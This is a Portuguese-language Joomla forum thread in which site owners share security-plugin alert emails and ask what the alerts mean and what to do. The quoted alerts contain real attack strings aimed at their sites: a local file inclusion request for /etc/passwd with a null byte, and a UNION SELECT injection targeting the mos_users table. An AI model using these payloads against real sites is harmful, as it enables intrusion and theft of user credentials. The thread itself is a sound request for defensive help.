vitima de email fraudulentos, ou tentativos de injection sql

  • ronneywiller
  • Avatar de ronneywiller Autor do Tópico
  • Offline
  • JCB! Junior
  • JCB! Junior
Mais
13 anos 11 meses atrás #57679 por ronneywiller
ronneywiller created the topic: vitima de email fraudulentos, ou tentativos de injection sql
pessoal recebi duas mensagem do meu joomla .... da seguinte forma no meu email.:


Root User por isis.turbo.com para mim
mostrar detalhes 07:12 (1 hora atrás)
** Local File Inclusion [GET:controller] => ../../../../../etc/passwd
** Local File Inclusion [REQUEST:controller] => ../../../../../etc/passwd

**PAGE / SERVER INFO


*REMOTE_ADDR :
178.137.151.97

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_propiedades&controller=../../../../../etc/passwd%00



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
-[option] => com_propiedades
-[controller] => ../../../../../etc/passwd


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
-[option] => com_propiedades
-[controller] => ../../../../../etc/passwd





o que significa isso ???

qual providencia devo tomar ?

Please Entrar ou Registrar to join the conversation.


Mais
13 anos 10 meses atrás #60366 por marceloquinze2
marceloquinze2 replied the topic: Re: vitima de email fraudulentos, ou tentativos de injection sql
Permitam-me que eu exponha o meu problema, que é parecido com o do colega. Para não abrir outro tópico, quis continuar o assunto.
De dois dias para cá eu também ando recebendo alertas do plugin "Marco's SQL Injection", os quais me mostram que alguém com IPs dos EUA está tentando atacar meu site.
Engraçado que parece que o hacker está testando diversas extensões que eu nem tenho instaladas no meu site (com_jokes, com_helloworld, com_glossary e por aí vai). Em todas as tentativas, o cara está querendo fazer algo com a tabela jos_users ou mos_users. Para minha segurança, há um tempo eu mudei o prefixo das tabelas, restringi o acesso à pasta /administrator.
Alguém sabe dizer se esse tipo de tentativa de ataque pode resultar em algo, mesmo eu tendo tomado as providências que eu citei acima?
Segue um dos alertas recebidos:

** Union Select [GET:catid] => -1/**/union/**/select/**/1,0x33633273366962,0x33633273366962,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users--
** Union Select [REQUEST:catid] => -1/**/union/**/select/**/1,0x33633273366962,0x33633273366962,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users--

**PAGE / SERVER INFO


*REMOTE_ADDR :
173.212.195.136

*HTTP_USER_AGENT :
Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefox/3.5.6

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_glossary&func=display&Itemid=s@bun&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users--



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
-[option] => com_glossary
-[func] => display
-[Itemid] => s@bun
-[catid] => -1/**/union/**/select/**/1,0x33633273366962,0x33633273366962,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users--


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
-[option] => com_glossary
-[func] => display
-[Itemid] => s@bun
-[catid] => -1/**/union/**/select/**/1,0x33633273366962,0x33633273366962,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users--

Please Entrar ou Registrar to join the conversation.

  • ronneywiller
  • Avatar de ronneywiller Autor do Tópico
  • Offline
  • JCB! Junior
  • JCB! Junior
Mais
13 anos 10 meses atrás #60385 por ronneywiller
ronneywiller replied the topic: Re: vitima de email fraudulentos, ou tentativos de injection sql
gostei amigao ... como fazer paa mudar o prefixo das tabelas do joomla sem que o sistema seja prejudicado ?

Please Entrar ou Registrar to join the conversation.